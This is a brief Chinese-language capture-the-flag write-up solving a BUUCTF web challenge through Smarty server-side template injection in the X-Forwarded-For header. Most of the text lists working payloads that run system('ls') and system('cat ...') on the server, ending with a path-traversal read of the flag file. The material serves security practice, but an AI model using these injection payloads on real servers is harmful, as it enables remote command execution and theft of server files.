BUUCTF之[CISCN2019 华东南赛区]Web11
知识点
- SSTI
- smarty
- X-Forwarded-For
题目
于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1
emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到!
所以开始尝试一下:X-Forwarded-For:{7*8}
获取当前目录有那些文件:X-Forwarded-For:{system('ls')}
读取某个文件比如:X-Forwarded-For:{system('cat /api')}
。但是我试了以下的所有文件都没找到flag
- X-Forwarded-For:{system(‘cat /api’)}
- X-Forwarded-For:{system(‘cat /css’)}
- X-Forwarded-For:{system(‘cat /index.php’)}
- X-Forwarded-For:{system(‘cat /smarty’)}
- X-Forwarded-For:{system(‘cat /templates_c’)}
- X-Forwarded-For:{system(‘cat /xff’)}
- X-Forwarded-For:{system(‘cat /flag’)}
- X-Forwarded-For:{system(‘cat /flag.php’)}
所以猜测flag可能是在根目录下,所以X-Forwarded-For:{system('cat ../../../../../../../../flag')}
这样就可以获取到flag啦!!!